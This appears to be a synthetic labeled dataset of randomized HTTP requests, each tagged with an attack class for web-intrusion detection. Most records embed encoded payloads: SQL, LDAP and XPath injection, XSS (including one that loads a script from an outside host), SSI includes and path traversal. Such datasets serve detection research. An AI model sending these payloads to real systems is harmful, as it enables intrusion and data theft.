If-Range: Sat, 19 Dec 09 15:43:55 CET
Max-Forwards: 10
MIME-Version: 2.1
Pragma: nosPm=2rsehii
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: /nfmtj/tT2sla.jsp
TE: deflate,gzip
Trailer: Referer
User-Agent: dp3E (oycrvI6l)
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/5.3 www.tpreaxd6.css, FTP/6.0 www.vo51hnn.jpg
Transfer-Encoding: gnnae; dari7yo=NsoIestr
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 835 www.nteiea.shtml "rasrr" "Fri, 06 Jul 07 12:28:32 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49048
Start - Id: 49404
class: XPathInjection
GET /Nniesr5sprepgzoors/t.a6eB.dll?nde87yhhe=yhwu3yAzKC&ihms4ttan=eFwour%27%5D+++++%7C+++++P+++++%7C++%2F%2Fuser%5B++++name%2Ftext%28++%29%3D++%27nsmzq&TetHwrnw4=iirhnwyngad&AnhaOnrbok=tsrPf5u5m&Ho=atrtvar HTTP/1.0
Host: www.Ltetdtwr.ch:392
Connection: 23rhsj
Accept: text/*, application/zip;q=0.1, text/*
Accept-Charset: euc-cn;q=0.5, koi8-r
Accept-Encoding: *;q=0.5
Accept-Language: hyx-ooWmedn, vslhrTo-a0tdDr;q=0.9, ywe-Ui;q=0.3
Cache-Control: min-fresh=383
Client-ip: 81.222.19.244
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="461"
Date: Sun, 25 Sep 05 14:33:09 CET
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: pmtehnge
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Sun, 02 May 10 03:40:52 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jul 05 19:04:47 GMT
Max-Forwards: 353
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM dWJzaGxuZXR5c3Nsbm5kdXJ6MHJkcjdhUmFkaGFqdGhpbnZobnNl
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: /xTsis/sntm5Ak.php3
TE: trailers
Trailer: If-Range
User-Agent: aNnt9aic
UA-CPU: StrongARM
UA-Disp: 427,646,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: compress
Upgrade: shoq/5.8, ecn/2.0, sha/2.4
Warning: 573 www.w0le3ue.js:98108 "oaMintne07soeaotcrtl" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49404
Start - Id: 37912
class: LdapInjection
GET /nwbEeoa6ea/gRlCq/LqdzKj/ioI2dfiiRacidlre7py/u8kZX/fpasswdhttps.cfm?lN=rpr+%29t&odiaicxeEItNch=76383526&gget2ear=ir6is&rsle9=7&ups=284810&llhipYRy=nMtAyHOtRxx&rtd6sE9w6ai=+nsEuroAegD04dt&2sedhageKbeohh=c%5D&s4L=%29++++%28+++%7C+++%28displayName%3Dhad*%29%28name+++%3D++had*++%29%28++++mail%3Dhad*+%29&Abetween.processing-instructionIBnoEViv=esdneon4e%3ABa&O8pQm4lsWrcp=yselectoisinma HTTP/1.1
Host: 34.92.127.34
Connection: ur5hod
Accept: */*
Accept-Charset: windows-1250, x-mac-roman;q=0.8
Accept-Encoding: *
Accept-Language: 3odc7-8;q=0.5, e70-et
Cache-Control: no-store
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="4"
Date: Wed, 10 May 06 20:58:07 CET
ETag: "wOq5RcWCDamiFvJi"
Expect: aPouw=afta
From: ricsu5la@emarau.st
If-Modified-Since: Mon, 20 Aug 07 03:16:40 UTC
If-Unmodified-Since: Fri, 12 Jun 09 02:40:26 GMT
If-Match: *
If-None-Match: "nn.aGJcXiGQ.bxX9"
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 83
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="Ecqddp7j"
Authorization: Digest opaque="toio"
Range: -8
Referer: /rimw/TpeMyukn/illeeono/Orn0xis/nvya.swf
TE: chunked,trailers,gzip;q=0.3
Trailer: Host
User-Agent: Mozilla/5.4 (X11; U; Unix 8.9; ts-6o; rv:9.5.0) Gecko/57824391
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: 4.7 www.otneeng.tiff, 7.1 www.ohtji.jpg
Transfer-Encoding: umnc2
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 03021
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37912
Start - Id: 42610
class: SqlInjection
GET /mg_r6Kca9j0taFma.msf?EtVbyps8ieha=or++0%3C%3E%28select+++++count%28*%29+++++from++vI7%29&wnfHnrlzhoXpe=+3l%25u HTTP/1.0
Host: 33.95.23.106
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: us-ascii, iso-8859-6, iso-8859-2, windows-1252, windows-1253;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=28636
Client-ip: 105.113.178.254
Cookie: ayqi0m=a3~ d;1qrn=rvZarj3vkgG
Cookie2: $Version="901"
Date: Sun, 15 Feb 04 07:45:21 UTC
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: Ttm5ttN@Sin1.net
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Sat, 15 Nov 08 17:36:07 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 03:46:25 UTC
Max-Forwards: 386
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: kIy2iv dgso3rtl=ecuz
Referer: /rqnnn.pl
TE: gzip,deflate,deflate
Trailer: Warning
User-Agent: Mozilla/4.7 (compatible; Konqueror/2.0; Linux i386; rRssrh)
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: 6.4 www.qifsr.css, FTP/2.0 186.138.53.66
Transfer-Encoding: compress
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 729 www.otcoid.tiff:28507 "rzihggorRptsfrvcprf" 
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42610
Start - Id: 47095
class: XSS
GET /72TjTpWq/hLmi/BJDVcphpCM/i0be5G.gif?ieoasetox=2&negxi1d=026577&eimft=%3Ciframe+++src++%3D++++%22vbscript%3A%5Balert++%28%27eneno%27%29%3B%5D+%22%3E&da=aitelnetD&GtumailHLbe15htaccesY=wttelnettidensFaUmh+&remeiw2uoemo3l6=t9ipwaqese0mn%40&tehortdusho0i=o56&grenpTei1m=horigREsw%24nkgtss&6rn1hlg=ispm1irS&g46inhinln=nb2lhosabdE&iqcSohebne=9NKWchn&lzr3tt9hm=m9%2Bz%5C HTTP/1.1
Host: 3.194.204.32:02203
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.2, iso-8859-15, cp-936;q=0.7, cp-950, iso-8859-5
Accept-Encoding: *;q=0.9
Accept-Language: xua1ao-8rYejig, cewgEe-uenhh;q=0.4
Cache-Control: no-store
Client-ip: 51.141.13.228
Cookie: aS7z9=r(oeaiametaR v?ueyid 
Cookie2: $Version="713"
Date: Fri, 28 Nov 08 17:30:13 CET
ETag: "NVqARtN0JGV.Ro_eNoEv"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Mon, 04 Sep 06 15:44:44 GMT
If-Unmodified-Since: Wed, 21 Apr 04 14:15:48 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 31 May 06 22:30:32 UTC
Max-Forwards: 753
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: eeao odltmn=s0Nias
Range: 74-7756,9-
Referer: http://rhmr.de/8lnsv/sIseLl/fsJt7ve.gif
TE: trailers
Trailer: Cache-Control
User-Agent: emobs (onb2-x9R)
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 320x898
Via: FTP/2.4 106.167.146.32:2071
Transfer-Encoding: iaoep; rsty=jmJfss
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47095
Start - Id: 45248
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: 182.107.86.214
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: aet-Ioo, eug-rsei, Pwtlt27-t0tvxijy
Cache-Control: min-fresh=85
Client-ip: 172.49.251.232
Cookie: Tcoqa=Trsbkvseuu;krbruSehmanqdo=et6 ;eitx4D=gfedtrns;nERtxIr=eu81e@
Cookie2: $Version="58"
Date: Sun, 18 Jun 06 09:36:09 UTC
ETag: "Pu1YkuKQwOOI@WRjk"
Expect: nT6mf=6igw
From: 77tu@22noeois.uk
If-Modified-Since: Wed, 23 Jun 04 21:05:01 UTC
If-Unmodified-Since: Tue, 05 Aug 08 21:38:46 GMT
If-Match: *
If-None-Match: "ZnGQD8BYj2k0iDd9UR"
If-Range: Sun, 25 Jan 09 09:28:44 UTC
Max-Forwards: 4
MIME-Version: 1.7
Pragma: e2afl='nmu'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM bWVzdG1zdHJzZWFhYXlkaG9JZjZ2a2c3dG9sYWluMm5UYzJvbw==
Range: 220-5761,42620-
Referer: http://eirig.st/psnroji/w1ysct.swf
TE: trailers
Trailer: Accept
User-Agent: epO_fa http://www.t0eenhm.fr
UA-CPU: x86
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/4.1 235.151.203.81, szO/2.2 www.oltsih.tiff, 0.4 www.ltnbesen.htm
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45248
Start - Id: 49946
class: XPathInjection
GET /VaJihduutVDNTo/YadminididlibQgi-N/aEsac2tjcitnA/xKD-z/54XlMhM..cgi?dbhNbowyeamd8=i%2FreiNaA%2FSr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D070%5D+or+++++%27nonoEs4n%27++%3D++++%27&rtyir5aouMwo=yrOt7YOr84sxqotl&2te1ewpo=pR&ewSteitiS4Dls=tdaUbetweenruge+%2FtIh&ialYarbicv=bodywcehrne&8e9mbxetrp=bz&iuuicMroi=bliooRt&odhe=oncinputBngag HTTP/1.0
Host: 50.140.187.238:80
Connection: close
Accept: */*
Accept-Charset: shift_jis, isiri-3342;q=0.8, iso-8859-1, x-mac-cyrillic
Accept-Encoding: compress, identity, compress;q=0.4, compress;q=0.5
Accept-Language: aiOrdLp-HnsA, acOUr-sstnhr;q=0.2, tdaoozeg-soie6lr;q=0.0, CPTobd-iBn7
Cache-Control: min-fresh=00
Client-ip: 6.57.199.123
Cookie: sfadtjtrnwninn=s ;hwcr=areox;hortk=3;ubVGjfgu=]asl ia;uyiii7o=3;cqrtimyymittenI=nNiCD
Cookie2: $Version="9"
Date: Sun, 19 Dec 04 21:40:26 GMT
ETag: "lxemiDvLWMw9dQLdPP"
Expect: 100-continue
From: ntedRr@r9cY.gov
If-Modified-Since: Mon, 09 Jan 06 22:20:05 UTC
If-Unmodified-Since: Sun, 26 Sep 04 21:06:05 UTC
If-Match: *
If-None-Match: *
If-Range: "NgzO6o.LlAaZ_cOUp1"
Max-Forwards: 4897
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: /gniw8la.php
TE: trailers
Trailer: Expect
User-Agent: nosseDnsoi/3.8.9.1
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 299x2707
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: compress
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49946
Start - Id: 40644
class: SSI
GET /nNQuJNcdqzKeWiCY/redeTuhoh11rievme/winntqTWNaccept_WzUu/0ruoxbd2tthStaqlvt1/ElSOythleEeh/ou5sTp9@Hawm9X6Zl8K/cmG@1dj@Vixr1LV/aY_O_2380/_hBscript/ume6hxvttE/aewtsdn7/6CniI.pl?jUGZa4W2e07c=%3C%21--++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&yhia=2&NhjA.usrRsJMQ.=pml-TeDw8&atnysehhVibHd=e+dgp&amqe5tin8eTm6hh=scriptnassAmi HTTP/1.0
Host: 215.89.133.94
Connection: eeth
Accept: application/*, image/*
Accept-Charset: *
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 26.207.222.161
Cookie: tIoAEagu3du3=ou4q;ck4n=206098;QgKV5-odropZC=tMUZZ;emjhcdeah4neqim=Wo6hcrnee;ra=onlosrbgsoundbetweenD0h;z1Rdico8enrmr=sa5y88PrNwu
Cookie2: $Version="931"
Date: Wed, 21 Sep 05 07:37:16 GMT
ETag: W/"@Bb34y2UvJT1g6.YA"
Expect: ooeos=S6heu
From: temre6@tneo.biz
If-Modified-Since: Tue, 01 Jul 08 04:33:43 UTC
If-Unmodified-Since: Mon, 05 Mar 07 13:25:11 UTC
If-Match: "Ux7PiJTvBP_znqptT"
If-None-Match: "m-7fgxRSB.qeBczK9FB_"
If-Range: "0_vyhnPoV8LhtikmH"
Max-Forwards: 0341
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic cHRzZWFrOjBsaW1CdA==
Authorization: NTLM b0hoMGVlOGd0ZXRhZTc3b25uc0M0Z2V2b2dvT3BvZXRoVGU=
Range: -9579,186989-7
Referer: /sjAxane/aufieEe.fgf
TE: chunked
Trailer: Transfer-Encoding
User-Agent: 7uaS/2.7.2.3.8
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 002x244
Via: FTP/7.1 164.60.33.169, 2.0 www.ee1h.png
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 643 www.anntntto.js "msA0earuygs" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 258483037119432010
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40644
Start - Id: 47318
class: XSS
GET /eses1i/vMEN5T5AX3bCs/amjhiqZ1zYrgy.mdb?etH=44133&nl5=ttei1nph-%26&ss=nqo82qC07%40Hu&esnGsb=173&JlaySS_H=%3Cdiv++style%3D++++%22+++++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.deroinre.com%2Fscript%2Flue.jsp%5D%29%3B+++++%22++%3E&hs7ame2etoOt=eoihEed+Tp&riiwpelka2e=rvove&ba=c27LhmOGRnDR&jRsltmpArOQ0UB=031645860&o0Noi=+32&nmT0vb2ecisr=nrnfaee6twheregtmp&jdyewehle=itO%2Fhrius8K++mnroR+&anewseeivdto=5Lbhtcei&fo9=33880958 HTTP/1.1
Host: 98.229.88.165:80
Connection: iieonsS
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.1, identity;q=0.4, deflate
Accept-Language: utobey-3, eutthet-ion1e, me4noou-uwtit, tD-agcnfa8, eael-6tShcp
Cache-Control: max-stale=18078
Client-ip: 188.124.236.19
Cookie: octrfEElophoih=670;inziylo=uEiN;letsej6eee=2Navebe;ttqeed=cscripteinclude nodeb3qb;n3teORtfliw1=mNsa7T0;e$ei;5qnHiwnrtd=944184
Cookie2: $Version="508"
Date: Fri, 19 Dec 08 01:28:20 GMT
ETag: W/"tViHpc6x1H6fcLzNQ"
Expect: 100-continue
From: ntsn@eneotga.ch
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Sun, 06 Aug 06 13:47:18 UTC
If-Match: *
If-None-Match: *
If-Range: "gcjlFnE8zU3h_gb"
Max-Forwards: 533
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest uri=http://www.kiaenw3.st/ehjeCct/ffEvEde/rm4i/ymaoit/rasiham.cgi
Range: -827060,69-,229-399617
Referer: http://www.2lYHdo.org/hs8aisss/rsce.swf
TE: chunked
Trailer: If-Match
User-Agent: woL9BkZ http://www.lero.ch
UA-CPU: Sparc
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5306x1733
Via: 0.4 www.acty.css, HTTP/1.8 7.17.142.252, 4.4 www.i2fewi.jpeg
Transfer-Encoding: identity
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47318
Start - Id: 49560
class: XPathInjection
GET /8ieeieuph/myTveRSaki0RdI/eG/aEratAnyLsaentur/liI49Dt/jAuNSaNms3N/Tj4Lg23Fo90/nutssrdasrssdcEnzh/8IwIehttps9c/shele4hsweurtotst.png?pihhbtsatnpro=c7R&ii2=opent&kksnieuthoh83e=c9sn2&omtzhns=8sf%27+++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27ash8y%27++++%3D+++%27&iT5haruwme=86634 HTTP/1.1
Host: 135.97.163.92
Connection: close
Accept: image/*
Accept-Charset: us-ascii;q=0.2, iso-8859-15, koi8-r;q=0.3, x-mac-hebrew
Accept-Encoding: deflate;q=0.1, gzip;q=0.2
Accept-Language: *;q=0.3
Cache-Control: min-fresh=9017
Client-ip: 69.118.218.13
Cookie: ssitevxecoei=jrEnc0ojoie1n;Etfoahfbsdiychz=e0 mhsaifNs0passthru2s
Cookie2: $Version="79"
Date: Sun, 29 Apr 07 04:58:27 UTC
ETag: "XzC6Z-Vy8j2n97GIJ"
Expect: 100-continue
From: swnuaoul@meaPt.org
If-Modified-Since: Mon, 19 Sep 05 17:29:16 UTC
If-Unmodified-Since: Sat, 03 Dec 05 06:14:53 UTC
If-Match: "gSfVBjMCwIxcO2KBCV"
If-None-Match: *
If-Range: Wed, 21 Apr 10 06:53:47 UTC
Max-Forwards: 906
MIME-Version: 6.7
Pragma: dowadlt='aeenaloe'
Proxy-Authorization: 9a2ilt dswfus7=iredewem
Authorization: Digest nonce
Range: 5151-28,-30112,9663-34
Referer: http://sohbou1n.ch/qr4lssll/reggais/crocuzT/ottRf.php
TE: trailers,gzip;q=0.4,deflate;q=0.6
Trailer: Accept
User-Agent: eF1rASro
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: 8.0 www.fdlOhZh.jpg
Transfer-Encoding: deflate
Upgrade: raJ/4.1, pg1pn/6.6
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49560
Start - Id: 45739
class: PathTransversal
GET /nYj6DTdKut8xjrKV/_8/uoRIQDE0O/bJu7vFHfjcyHxCXwDw/7opten2eyshyxh/dlaeiide1/stnbtsn/j_ftp-Tq7VgD.php3?Niwengco5tnimo=n2+ueenc9h0v&dstilsip=4800020136&awrnO9Toesi=5%25i&khoifiuceswdel=18583160&damRvato8=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Finniel%2Fteitiser%2Fma%2Fatng.cgi&rno=abIQ&yeT2csacrmnssoq=e46o&7F8G2GPYPAy=Tsi6schr%24incmdlc&luegcun=reginputa HTTP/1.1
Host: www.utohf2.it
Connection: keep-alive
Accept: image/gif
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.0, compress, compress, deflate
Accept-Language: sTO-EimttAss;q=0.8, le-f;q=0.4, irt-9t7sn;q=0.6
Cache-Control: no-store
Client-ip: 172.160.2.55
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Sun, 12 Apr 09 15:13:37 CET
ETag: W/"MmZYP5uH2Z8Y7FOUG_"
Expect: twlia9=reoe
From: eyebc4et@nriRuu.de
If-Modified-Since: Tue, 29 Sep 09 11:46:58 GMT
If-Unmodified-Since: Wed, 13 Jan 10 04:52:02 UTC
If-Match: "S1Jm.KYM.s2V9W_b5Bx7"
If-None-Match: *
If-Range: Sun, 12 Aug 07 16:44:49 UTC
Max-Forwards: 101
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Digest opaque="feamso"
Range: -500252,934-3694
Referer: /awaod/cefbale/fege/ytto.msf
TE: chunked,trailers
Trailer: Via
User-Agent: dWzRYPLwP http://www.aeehqr.com
UA-CPU: Sparc
UA-Disp: 3522,615,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: HTTP/7.3 152.107.181.213, 1.6 www.ooynE4sM.gif, 3.6 154.120.161.205:5
Transfer-Encoding: Iyys; d6endwv=tx0d
Upgrade: gise/4.4, ekas/4.1, Clis/0.2
Warning: 198 5.109.101.104 "kAoaslle" 
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 3591562194850483
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45739
Start - Id: 38044
class: LdapInjection
GET /eeed/2EE1/Aicohli/fu/rm9xeVrU0JcV8I8KXW7/sKl7wnX/nlatd3hiNa/snnmecueondsrtdn/mGDR@o.c-8rHuj3Y.msf?kState=y_a.i&nmz2uacpbwa=3&drophomefw_h=cdivwinnt&TtkKiA5N=aIsUf&tgcnacreqnaR=of&ndyootsGHiecw=++&eysFsos0tmyo=shr%3Dp&elnso=s5scriptel699gs%2F57eh%26&m1XJtYfiframefromw=5404%29%28%26%28objectClass%3DviBl%29%28%7C%28sn+%3DnM9%29%28cn%3De+++++J*%29%29&f@nTae5=0&lMOiSg8=d%3BnA%5De%3Fa%7Ed%2B&ia=otnrhuo0dmn1i&eaercilh9m0=+%7C+utall%2Fka+&epraent=5961250 HTTP/1.1
Host: www.aylc.net
Connection: keep-alive
Accept: application/*, image/gif
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: Iy-seryHe6e;q=0.6, nueo-reratev;q=0.0, r-sncCi, iue-o;q=0.8, Esl-mhlwFal;q=0.6
Cache-Control: min-fresh=6090
Client-ip: 95.187.198.147
Cookie: MMn7d=362;pinisewo=hpJxgiAiF;VuUmRphpjGkunionv=xn+ 
Cookie2: $Version="114"
Date: Sun, 14 Jan 07 10:08:27 CET
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: el5e=GntnhEqt
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 03 Mar 09 05:55:41 CET
If-Unmodified-Since: Sat, 29 Jan 05 06:07:42 GMT
If-Match: "FIyTEpIhW2ABRo5"
If-None-Match: "4tqrvZU3DShp.BS0"
If-Range: "QMRAQjv9PG5j7nUDk"
Max-Forwards: 009
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest qop=auth-int
Range: 6583-,350-4,-7502
Referer: http://www.evtssnR.org/etsDsShy/Pt6pr/ks2af/tt8crata.html
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 7.0; ce-el; rv:2.1.5) Gecko/65012073
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 0.2 23.8.130.55:17
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 961 113.136.152.242 "nasatnD5Noznimfy" "Sun, 16 Apr 06 05:05:21 UTC"
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38044
Start - Id: 42701
class: SqlInjection
POST /eekgilnbio/pR_NIW2CE5y@/nemhol/OAFh8/hL2m-moANeSU0K/rnW7@zq.CgH@FyM6kqx/IbDQEqKprocessing-instruction_/GWor1ciframeB26.A9E7E/s2N8UP.swf? HTTP/1.0
Content-Length: 98
Content-Language: geeu5ds,nhdt,iwalEa
Content-Encoding: identity
Content-Location: /E9qr/epc9tE/hpEm/m1rRsrme/ibhuue.mdb
Content-MD5: YTRuZTdpMnIxdXprYmFubA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Mar 04 21:53:13 UTC
Last-Modified: Sun, 22 Oct 06 24:38:47 CET
Host: 85.160.144.203:187
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15, euc-kr, us-ascii
Accept-Encoding: gzip;q=0.9, compress;q=0.7, gzip
Accept-Language: *
Cache-Control: min-fresh=0339
Client-ip: 228.125.37.130
Cookie: ethQargesecl975= 7s
Cookie2: $Version="6"
Date: Mon, 25 May 09 19:17:33 GMT
ETag: W/"4C7tksCaaomG@_1Ns"
Expect: thse=41osoq;itilCa
From: neeio@ame9cqfri.it
If-Modified-Since: Wed, 07 May 08 02:41:27 GMT
If-Unmodified-Since: Mon, 27 Mar 06 04:30:01 GMT
If-Match: *
If-None-Match: *
If-Range: "3jWM@b6bqZ8asOM"
Max-Forwards: 6679
MIME-Version: 4.7
Pragma: Tu=eres
Proxy-Authorization: Digest opaque="bii1e"
Authorization: Basic b253YWFubjpjaXFoYw==
Range: -124964,11478-05
Referer: http://www.99jiei.biz/ahszer3.php4
TE: deflate;q=0.2,trailers
Trailer: Accept-Language
User-Agent: select jreSke from  ALL_USERS
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: FTP/7.2 www.hiErohi.jpg, fli/4.9 51.216.78.128, FTP/0.6 191.255.65.86
Transfer-Encoding: compress
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 745 www.otrKU.jpeg "mdsiI" "Sun, 31 Jul 05 23:34:34 CET"
X-Forwarded-For: 29.202.205.12
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ayyt1s=939771&nNegzlih4=930608955&qsgsM=ztt7&.passwdjaO7F=jlx&msutowEtrm=oe~z  ~shhOr&lnre1=tt

End - Id: 42701
Start - Id: 35373
class: SqlInjection
GET /LDL2/eqdq/tmyMnhellbnufasaf/ngofju/tJJn3IcG-P/Ewhereg/isuv9mniowdgarcsr3u/5JmdIDr0a_.msf?Tzsrcb=aobe&XcQwaccess_log.xOQperlE=and+++0%3C%3E%28select+++count%28*%29+from++++IHel++where++++Dnftax%3C%3E%29&Ih8Tuadmin-smochaq=nacetwfbNrml2hnali&1ieDheOUBjds=fkqY&8e7.KDservicesz=ueecdi&Baertm=Tes2 HTTP/1.0
Host: www.81ris7hti.com
Connection: uTcsgt
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 170.78.145.207
Cookie: otrothhHebn=hkhtg9mnc2r8'i;svmanedd=iwap
Cookie2: $Version="80"
Date: Sat, 10 Sep 05 06:42:33 CET
ETag: "9t_6VgnTeO2lMOGPcbH"
Expect: jetudl=mtent
From: oora@antny.ch
If-Modified-Since: Sun, 12 Apr 09 04:44:32 UTC
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: *
If-None-Match: "4mC-mPU73Nw2umZe"
If-Range: *
Max-Forwards: 2201
MIME-Version: 9.2
Pragma: kcnMe='dn1fyi9h'
Proxy-Authorization: Digest realm
Authorization: Basic ZTBrbGV0OmFpYTQwc2VT
Range: 187-
